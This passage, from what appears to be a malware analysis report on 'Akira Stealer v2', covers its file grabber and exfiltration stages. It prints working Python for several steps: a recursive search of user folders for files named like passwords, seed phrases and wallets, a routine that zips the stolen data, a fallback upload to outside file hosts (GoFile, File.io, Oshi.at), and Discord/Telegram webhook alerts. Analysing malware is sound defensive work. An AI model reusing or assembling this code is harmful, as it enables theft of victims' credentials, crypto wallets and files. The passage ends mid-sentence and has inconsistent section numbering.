phase.",[186,13432,13434],{"id":13433},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[12,13436,192],{},[12,13438,13439],{},"The stealer focuses on four high-yield folders:",[56,13441,13443],{"className":8482,"code":13442,"language":8484,"meta":65,"style":65},"searchFolders = [\n \"Desktop\",\n \"Documents\",\n \"Downloads\",\n \"OneDrive\"\n]\n",[63,13444,13445,13450,13455,13460,13465,13470],{"__ignoreMap":65},[102,13446,13447],{"class":104,"line":105},[102,13448,13449],{},"searchFolders = [\n",[102,13451,13452],{"class":104,"line":111},[102,13453,13454],{}," \"Desktop\",\n",[102,13456,13457],{"class":104,"line":329},[102,13458,13459],{}," \"Documents\",\n",[102,13461,13462],{"class":104,"line":346},[102,13463,13464],{}," \"Downloads\",\n",[102,13466,13467],{"class":104,"line":650},[102,13468,13469],{}," \"OneDrive\"\n",[102,13471,13472],{"class":104,"line":656},[102,13473,11913],{},[12,13475,13476],{},"Each folder is interpreted relative to the victim’s home directory:",[56,13478,13480],{"className":8482,"code":13479,"language":8484,"meta":65,"style":65},"for folder in searchFolders:\n current_path = os.path.join(os.environ['USERPROFILE'], folder)\n if os.path.exists(current_path):\n # proceed to scan\n",[63,13481,13482,13487,13492,13497],{"__ignoreMap":65},[102,13483,13484],{"class":104,"line":105},[102,13485,13486],{},"for folder in searchFolders:\n",[102,13488,13489],{"class":104,"line":111},[102,13490,13491],{}," current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,13493,13494],{"class":104,"line":329},[102,13495,13496],{}," if os.path.exists(current_path):\n",[102,13498,13499],{"class":104,"line":346},[102,13500,13501],{}," # proceed to scan\n",[186,13503,13505],{"id":13504},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[12,13507,192],{},[12,13509,13510],{},[251,13511,13512],{},"Keyword List",[12,13514,13515],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[56,13517,13519],{"className":8482,"code":13518,"language":8484,"meta":65,"style":65},"keywordsFiles = [\n \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[63,13520,13521,13526,13531,13536],{"__ignoreMap":65},[102,13522,13523],{"class":104,"line":105},[102,13524,13525],{},"keywordsFiles = [\n",[102,13527,13528],{"class":104,"line":111},[102,13529,13530],{}," \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[102,13532,13533],{"class":104,"line":329},[102,13534,13535],{}," \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[102,13537,13538],{"class":104,"line":346},[102,13539,11913],{},[1255,13541,13542,13558],{},[1258,13543,13544,13547,13548,13551,13552,4598,13555,1014],{},[251,13545,13546],{},"Partial Matches",": Keywords like ",[63,13549,13550],{},"passw"," capture both ",[63,13553,13554],{},"passwords.txt",[63,13556,13557],{},"passw_backup.docx",[1258,13559,13560,13563],{},[251,13561,13562],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[186,13565,13567],{"id":13566},"_7113-allowed-file-types","7.11.3 Allowed File Types",[12,13569,192],{},[12,13571,13572],{},"To minimize noise, a whitelist of extensions is enforced:",[56,13574,13576],{"className":8482,"code":13575,"language":8484,"meta":65,"style":65},"allowed_extensions = [\n \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n \".jpg\", \".png\"\n]\n",[63,13577,13578,13583,13588,13593],{"__ignoreMap":65},[102,13579,13580],{"class":104,"line":105},[102,13581,13582],{},"allowed_extensions = [\n",[102,13584,13585],{"class":104,"line":111},[102,13586,13587],{}," \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[102,13589,13590],{"class":104,"line":329},[102,13591,13592],{}," \".jpg\", \".png\"\n",[102,13594,13595],{"class":104,"line":346},[102,13596,11913],{},[186,13598,13600],{"id":13599},"_7113-size-constraint","7.11.3 Size Constraint",[12,13602,192],{},[12,13604,13605],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[56,13607,13609],{"className":8482,"code":13608,"language":8484,"meta":65,"style":65},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n # eligible for copy\n",[63,13610,13611,13616,13621],{"__ignoreMap":65},[102,13612,13613],{"class":104,"line":105},[102,13614,13615],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[102,13617,13618],{"class":104,"line":111},[102,13619,13620],{},"if file_size_mb \u003C= 2:\n",[102,13622,13623],{"class":104,"line":329},[102,13624,13625],{}," # eligible for copy\n",[186,13627,13629],{"id":13628},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[12,13631,192],{},[12,13633,13634],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[12,13636,13637,13638,13641],{},"The core routine ",[63,13639,13640],{},"steal_files()"," operates as follows:",[56,13643,13645],{"className":8482,"code":13644,"language":8484,"meta":65,"style":65},"@staticmethod\ndef steal_files():\n stolen_files = set()\n temp_folder = Utils.get_temp_folder()\n\n for folder in searchFolders:\n current_path = os.path.join(os.environ['USERPROFILE'], folder)\n if os.path.exists(current_path):\n for root, _, files in os.walk(current_path):\n for file in files:\n lower = file.lower()\n # Keyword check\n if any(keyword in lower for keyword in keywordsFiles):\n ext = os.path.splitext(lower)[1]\n # Extension and size check\n if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n # Prepare destination\n files_dir = os.path.join(temp_folder, \"Files\")\n os.makedirs(files_dir, exist_ok=True)\n shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n stolen_files.add(file)\n data.stolen_files.extend(stolen_files)\n",[63,13646,13647,13651,13656,13661,13666,13670,13675,13680,13685,13690,13695,13700,13705,13710,13715,13720,13725,13730,13735,13740,13745,13750],{"__ignoreMap":65},[102,13648,13649],{"class":104,"line":105},[102,13650,8971],{},[102,13652,13653],{"class":104,"line":111},[102,13654,13655],{},"def steal_files():\n",[102,13657,13658],{"class":104,"line":329},[102,13659,13660],{}," stolen_files = set()\n",[102,13662,13663],{"class":104,"line":346},[102,13664,13665],{}," temp_folder = Utils.get_temp_folder()\n",[102,13667,13668],{"class":104,"line":650},[102,13669,7846],{"emptyLinePlaceholder":2180},[102,13671,13672],{"class":104,"line":656},[102,13673,13674],{}," for folder in searchFolders:\n",[102,13676,13677],{"class":104,"line":662},[102,13678,13679],{}," current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,13681,13682],{"class":104,"line":668},[102,13683,13684],{}," if os.path.exists(current_path):\n",[102,13686,13687],{"class":104,"line":674},[102,13688,13689],{}," for root, _, files in os.walk(current_path):\n",[102,13691,13692],{"class":104,"line":680},[102,13693,13694],{}," for file in files:\n",[102,13696,13697],{"class":104,"line":9019},[102,13698,13699],{}," lower = file.lower()\n",[102,13701,13702],{"class":104,"line":9025},[102,13703,13704],{}," # Keyword check\n",[102,13706,13707],{"class":104,"line":9031},[102,13708,13709],{}," if any(keyword in lower for keyword in keywordsFiles):\n",[102,13711,13712],{"class":104,"line":9037},[102,13713,13714],{}," ext = os.path.splitext(lower)[1]\n",[102,13716,13717],{"class":104,"line":9043},[102,13718,13719],{}," # Extension and size check\n",[102,13721,13722],{"class":104,"line":9049},[102,13723,13724],{}," if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[102,13726,13727],{"class":104,"line":9055},[102,13728,13729],{}," # Prepare destination\n",[102,13731,13732],{"class":104,"line":9061},[102,13733,13734],{}," files_dir = os.path.join(temp_folder, \"Files\")\n",[102,13736,13737],{"class":104,"line":9067},[102,13738,13739],{}," os.makedirs(files_dir, exist_ok=True)\n",[102,13741,13742],{"class":104,"line":9073},[102,13743,13744],{}," shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[102,13746,13747],{"class":104,"line":9079},[102,13748,13749],{}," stolen_files.add(file)\n",[102,13751,13752],{"class":104,"line":9085},[102,13753,13754],{}," data.stolen_files.extend(stolen_files)\n",[12,13756,13757],{},[251,13758,13759],{},"Key points:",[6086,13761,13762,13770,13779,13788,13794],{},[1258,13763,13764,13769],{},[251,13765,13766],{},[63,13767,13768],{},"os.walk",": Recursively descends into subdirectories.",[1258,13771,13772,13775,13776,1014],{},[251,13773,13774],{},"Case-insensitive matching",": Filenames are normalized via ",[63,13777,13778],{},"lower()",[1258,13780,13781,13784,13785,13787],{},[251,13782,13783],{},"Atomic copy",": Uses ",[63,13786,11779],{}," to preserve file content.",[1258,13789,13790,13793],{},[251,13791,13792],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[1258,13795,13796,1062,13801,13804],{},[251,13797,13798,13799],{},"Integration with ",[63,13800,13057],{},[63,13802,13803],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[186,13806,13808],{"id":13807},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[12,13810,192],{},[12,13812,13813,13814,13816],{},"After collection, the ",[63,13815,12261],{}," folder is zipped and dispatched:",[56,13818,13820],{"className":8482,"code":13819,"language":8484,"meta":65,"style":65},"# Archive\nUtils.zip_client_file() # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[63,13821,13822,13827,13832,13836,13841,13846],{"__ignoreMap":65},[102,13823,13824],{"class":104,"line":105},[102,13825,13826],{},"# Archive\n",[102,13828,13829],{"class":104,"line":111},[102,13830,13831],{},"Utils.zip_client_file() # creates CLIENT.zip from temp_folder\n",[102,13833,13834],{"class":104,"line":329},[102,13835,7846],{"emptyLinePlaceholder":2180},[102,13837,13838],{"class":104,"line":346},[102,13839,13840],{},"# Upload & Notify\n",[102,13842,13843],{"class":104,"line":650},[102,13844,13845],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[102,13847,13848],{"class":104,"line":656},[102,13849,13850],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1255,13852,13853,13868],{},[1258,13854,13855,13860,13861,805,13863,805,13865,7885],{},[251,13856,13857],{},[63,13858,13859],{},"zip_client_file()",": Compresses the entire temp directory, including ",[63,13862,12261],{},[63,13864,10315],{},[63,13866,13867],{},"Passwords",[1258,13869,13870,13874,13875],{},[251,13871,13872],{},[63,13873,13038],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[56,13876,13878],{"className":8482,"code":13877,"language":8484,"meta":65,"style":65},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[63,13879,13880,13885,13890,13895,13900],{"__ignoreMap":65},[102,13881,13882],{"class":104,"line":105},[102,13883,13884],{},"fields.append({\n",[102,13886,13887],{"class":104,"line":111},[102,13888,13889],{},"\"name\": \"📂 Files\",\n",[102,13891,13892],{"class":104,"line":329},[102,13893,13894],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[102,13896,13897],{"class":104,"line":346},[102,13898,13899],{},"\"inline\": False\n",[102,13901,13902],{"class":104,"line":650},[102,13903,13904],{},"})\n",[12,13906,13907],{},[251,13908,13909],{},"Conclusion:",[12,13911,13912],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items into an archive. Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[41,13914,13916],{"id":13915},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[12,13918,47],{},[12,13920,13921],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[186,13923,13925],{"id":13924},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[12,13927,192],{},[12,13929,13930],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. It also makes automated parsing or manual inspection much easier on the attacker side.",[56,13932,13935],{"className":13933,"code":13934,"language":61},[59],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│ ├ token_ab12cd34.txt\n│ └ token_ef56gh78.txt\n├─ Cookies\\\n│ ├ Chrome_Cookies.txt\n│ └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[63,13936,13934],{"__ignoreMap":65},[186,13938,13940],{"id":13939},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[12,13942,192],{},[12,13944,13945],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[56,13947,13949],{"className":8482,"code":13948,"language":8484,"meta":65,"style":65},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n f.write(token)\n",[63,13950,13951,13956,13961,13966,13971,13976,13981,13986,13991,13996],{"__ignoreMap":65},[102,13952,13953],{"class":104,"line":105},[102,13954,13955],{},"import os, shutil\n",[102,13957,13958],{"class":104,"line":111},[102,13959,13960],{},"# Constants\n",[102,13962,13963],{"class":104,"line":329},[102,13964,13965],{},"TMP = os.getenv('TEMP')\n",[102,13967,13968],{"class":104,"line":346},[102,13969,13970],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[102,13972,13973],{"class":104,"line":650},[102,13974,13975],{},"# Prepare structure\n",[102,13977,13978],{"class":104,"line":656},[102,13979,13980],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[102,13982,13983],{"class":104,"line":662},[102,13984,13985],{}," os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[102,13987,13988],{"class":104,"line":668},[102,13989,13990],{},"# Save token\n",[102,13992,13993],{"class":104,"line":674},[102,13994,13995],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[102,13997,13998],{"class":104,"line":680},[102,13999,14000],{}," f.write(token)\n",[1255,14002,14003,14006],{},[1258,14004,14005],{},"Tokens saved in separate small text files for quick inspection.",[1258,14007,14008,14009,14012,14013,1014],{},"Cookie dumps from ",[63,14010,14011],{},"Chromium.GetCookies()"," written to ",[63,14014,14015],{},"{Browser}_Cookies.txt",[186,14017,14019],{"id":14018},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[12,14021,192],{},[12,14023,14024,14025],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[14026,14027,14028,14029],"computer-name",{},"_",[14030,14031,14032],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[56,14034,14036],{"className":8482,"code":14035,"language":8484,"meta":65,"style":65},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n for dirpath, _, files in os.walk(root_dir):\n for fname in files:\n full = os.path.join(dirpath, fname)\n rel = os.path.relpath(full, root_dir)\n zf.write(full, rel)\n return zip_path\n",[63,14037,14038,14043,14047,14052,14057,14062,14067,14072,14077,14082,14087,14092,14097],{"__ignoreMap":65},[102,14039,14040],{"class":104,"line":105},[102,14041,14042],{},"import zipfile, datetime\n",[102,14044,14045],{"class":104,"line":111},[102,14046,7846],{"emptyLinePlaceholder":2180},[102,14048,14049],{"class":104,"line":329},[102,14050,14051],{},"def create_archive(root_dir: str) -> str:\n",[102,14053,14054],{"class":104,"line":346},[102,14055,14056],{}," ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[102,14058,14059],{"class":104,"line":650},[102,14060,14061],{}," zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[102,14063,14064],{"class":104,"line":656},[102,14065,14066],{}," zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[102,14068,14069],{"class":104,"line":662},[102,14070,14071],{}," with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[102,14073,14074],{"class":104,"line":668},[102,14075,14076],{}," for dirpath, _, files in os.walk(root_dir):\n",[102,14078,14079],{"class":104,"line":674},[102,14080,14081],{}," for fname in files:\n",[102,14083,14084],{"class":104,"line":680},[102,14085,14086],{}," full = os.path.join(dirpath, fname)\n",[102,14088,14089],{"class":104,"line":9019},[102,14090,14091],{}," rel = os.path.relpath(full, root_dir)\n",[102,14093,14094],{"class":104,"line":9025},[102,14095,14096],{}," zf.write(full, rel)\n",[102,14098,14099],{"class":104,"line":9031},[102,14100,14101],{}," return zip_path\n",[1255,14103,14104],{},[1258,14105,14106,14107,14110],{},"Archive named ",[63,14108,14109],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[12,14112,14113],{},[251,14114,14115],{},"ZIP Filename Convention",[12,14117,14118],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[56,14120,14122],{"className":8482,"code":14121,"language":8484,"meta":65,"style":65},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n return zip_path\n",[63,14123,14124,14129,14133,14137,14142,14146,14151,14155,14159],{"__ignoreMap":65},[102,14125,14126],{"class":104,"line":105},[102,14127,14128],{},"import datetime, os\n",[102,14130,14131],{"class":104,"line":111},[102,14132,7846],{"emptyLinePlaceholder":2180},[102,14134,14135],{"class":104,"line":329},[102,14136,14051],{},[102,14138,14139],{"class":104,"line":346},[102,14140,14141],{}," # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[102,14143,14144],{"class":104,"line":650},[102,14145,14056],{},[102,14147,14148],{"class":104,"line":656},[102,14149,14150],{}," # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n",[102,14152,14153],{"class":104,"line":662},[102,14154,14061],{},[102,14156,14157],{"class":104,"line":668},[102,14158,14066],{},[102,14160,14161],{"class":104,"line":674},[102,14162,14101],{},[12,14164,14118],{},[186,14166,14168],{"id":14167},"_7144-upload-workflow","7.14.4 Upload Workflow",[12,14170,192],{},[12,14172,14173],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[6086,14175,14176,14208,14235],{},[1258,14177,14178,14181],{},[251,14179,14180],{},"Primary: GoFile.io",[1255,14182,14183,14191,14199],{},[1258,14184,14185,1062,14188],{},[251,14186,14187],{},"API to fetch servers",[63,14189,14190],{},"GET https://api.gofile.io/servers",[1258,14192,14193,1062,14196],{},[251,14194,14195],{},"Upload endpoint",[63,14197,14198],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[1258,14200,14201,1062,14204,14207],{},[251,14202,14203],{},"Response field",[63,14205,14206],{},"data.downloadPage"," contains final URL.",[1258,14209,14210,14213],{},[251,14211,14212],{},"Fallback #1: File.io",[1255,14214,14215,14225],{},[1258,14216,14217,1062,14219,5276,14222],{},[251,14218,14195],{},[63,14220,14221],{},"POST https://file.io/",[63,14223,14224],{},"files={'file': open(...)}",[1258,14226,14227,14230,14231,14234],{},[251,14228,14229],{},"Response",": JSON ",[63,14232,14233],{},"link"," field.",[1258,14236,14237,14240],{},[251,14238,14239],{},"Fallback #2: Oshi.at",[1255,14241,14242,14256],{},[1258,14243,14244,1062,14246,5276,14249,14252,14253,1014],{},[251,14245,14195],{},[63,14247,14248],{},"POST http://oshi.at/",[63,14250,14251],{},"files[]"," and parameters ",[63,14254,14255],{},"expire=43200, autodestroy=0",[1258,14257,14258,14260,14261,1014],{},[251,14259,14229],{},": Plain text containing ",[63,14262,14263],{},"DL: \u003Curl>",[12,14265,14266],{},[251,14267,14268],{},"Implementation Snippet:",[56,14270,14272],{"className":8482,"code":14271,"language":8484,"meta":65,"style":65},"import requests\n\ndef upload_with_fallback(zip_path):\n # GoFile\n try:\n servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n for srv in servers:\n try:\n r = requests.post(\n f'https://{srv}.gofile.io/contents/uploadfile',\n files={'file': open(zip_path,'rb')}, timeout=20)\n url = r.json()['data']['downloadPage']\n if url: return url\n except: continue\n except: pass\n # File.io\n try:\n r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n return r.json().get('link','')\n except: pass\n # Oshi.at\n try:\n text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n return text.split('DL: ')[1].strip()\n except: pass\n return ''\n",[63,14273,14274,14279,14283,14288,14293,14297,14302,14307,14312,14317,14322,14327,14332,14337,14342,14347,14352,14356,14361,14366,14370,14375,14379,14384,14389,14393],{"__ignoreMap":65},[102,14275,14276],{"class":104,"line":105},[102,14277,14278],{},"import requests\n",[102,14280,14281],{"class":104,"line":111},[102,14282,7846],{"emptyLinePlaceholder":2180},[102,14284,14285],{"class":104,"line":329},[102,14286,14287],{},"def upload_with_fallback(zip_path):\n",[102,14289,14290],{"class":104,"line":346},[102,14291,14292],{}," # GoFile\n",[102,14294,14295],{"class":104,"line":650},[102,14296,9134],{},[102,14298,14299],{"class":104,"line":656},[102,14300,14301],{}," servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[102,14303,14304],{"class":104,"line":662},[102,14305,14306],{}," for srv in servers:\n",[102,14308,14309],{"class":104,"line":668},[102,14310,14311],{}," try:\n",[102,14313,14314],{"class":104,"line":674},[102,14315,14316],{}," r = requests.post(\n",[102,14318,14319],{"class":104,"line":680},[102,14320,14321],{}," f'https://{srv}.gofile.io/contents/uploadfile',\n",[102,14323,14324],{"class":104,"line":9019},[102,14325,14326],{}," files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,14328,14329],{"class":104,"line":9025},[102,14330,14331],{}," url = r.json()['data']['downloadPage']\n",[102,14333,14334],{"class":104,"line":9031},[102,14335,14336],{}," if url: return url\n",[102,14338,14339],{"class":104,"line":9037},[102,14340,14341],{}," except: continue\n",[102,14343,14344],{"class":104,"line":9043},[102,14345,14346],{}," except: pass\n",[102,14348,14349],{"class":104,"line":9049},[102,14350,14351],{}," # File.io\n",[102,14353,14354],{"class":104,"line":9055},[102,14355,9134],{},[102,14357,14358],{"class":104,"line":9061},[102,14359,14360],{}," r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,14362,14363],{"class":104,"line":9067},[102,14364,14365],{}," return r.json().get('link','')\n",[102,14367,14368],{"class":104,"line":9073},[102,14369,14346],{},[102,14371,14372],{"class":104,"line":9079},[102,14373,14374],{}," # Oshi.at\n",[102,14376,14377],{"class":104,"line":9085},[102,14378,9134],{},[102,14380,14381],{"class":104,"line":9091},[102,14382,14383],{}," text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[102,14385,14386],{"class":104,"line":9097},[102,14387,14388],{}," return text.split('DL: ')[1].strip()\n",[102,14390,14391],{"class":104,"line":9103},[102,14392,14346],{},[102,14394,14395],{"class":104,"line":9770},[102,14396,14397],{}," return ''\n",[186,14399,14401],{"id":14400},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[12,14403,192],{},[12,14405,14406],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in place.",[12,14408,14409],{},[251,14410,14411],{},"Embed Notification",[56,14413,14415],{"className":8482,"code":14414,"language":8484,"meta":65,"style":65},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n 'username':'Akira 💊',\n 'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[63,14416,14417,14422,14427,14432,14437,14442,14447,14452,14457,14461,14466,14471,14476,14480],{"__ignoreMap":65},[102,14418,14419],{"class":104,"line":105},[102,14420,14421],{},"# Build embed with key metadata\n",[102,14423,14424],{"class":104,"line":111},[102,14425,14426],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[102,14428,14429],{"class":104,"line":329},[102,14430,14431],{},"fields = [\n",[102,14433,14434],{"class":104,"line":346},[102,14435,14436],{}," {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[102,14438,14439],{"class":104,"line":650},[102,14440,14441],{}," {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[102,14443,14444],{"class":104,"line":656},[102,14445,14446],{}," {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[102,14448,14449],{"class":104,"line":662},[102,14450,14451],{}," {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n",[102,14453,14454],{"class":104,"line":668},[102,14455,14456],{}," {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[102,14458,14459],{"class":104,"line":674},[102,14460,11913],{},[102,14462,14463],{"class":104,"line":680},[102,14464,14465],{},"payload = {\n",[102,14467,14468],{"class":104,"line":9019},[102,14469,14470],{}," 'username':'Akira 💊',\n",[102,14472,14473],{"class":104,"line":9025},[102,14474,14475],{}," 'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[102,14477,14478],{"class":104,"line":9031},[102,14479,6410],{},[102,14481,14482],{"class":104,"line":9037},[102,14483,14484],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[1255,14486,14487,14493],{},[1258,14488,14489,14492],{},[251,14490,14491],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[1258,14494,14495,14498,14499,14502],{},[251,14496,14497],{},"Embed Link",": Contains a clickable ",[63,14500,14501],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[12,14504,14505],{},[251,14506,14507],{},"Raw Link Fallback",[56,14509,14511],{"className":8482,"code":14510,"language":8484,"meta":65,"style":65},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[63,14512,14513,14518,14523],{"__ignoreMap":65},[102,14514,14515],{"class":104,"line":105},[102,14516,14517],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[102,14519,14520],{"class":104,"line":111},[102,14521,14522],{},"message = f\"📥 Archive available at: {download_url}\"\n",[102,14524,14525],{"class":104,"line":329},[102,14526,14527],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[1255,14529,14530],{},[1258,14531,14532,14535],{},[251,14533,14534],{},"Plain Text",": Guarantees delivery of the link in case embeds are blocked or silently dropped.",[12,14537,14538],{},[251,14539,14540],{},"How the Attacker Retrieves the Link",[12,14542,14543,14546],{},[251,14544,14545],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware 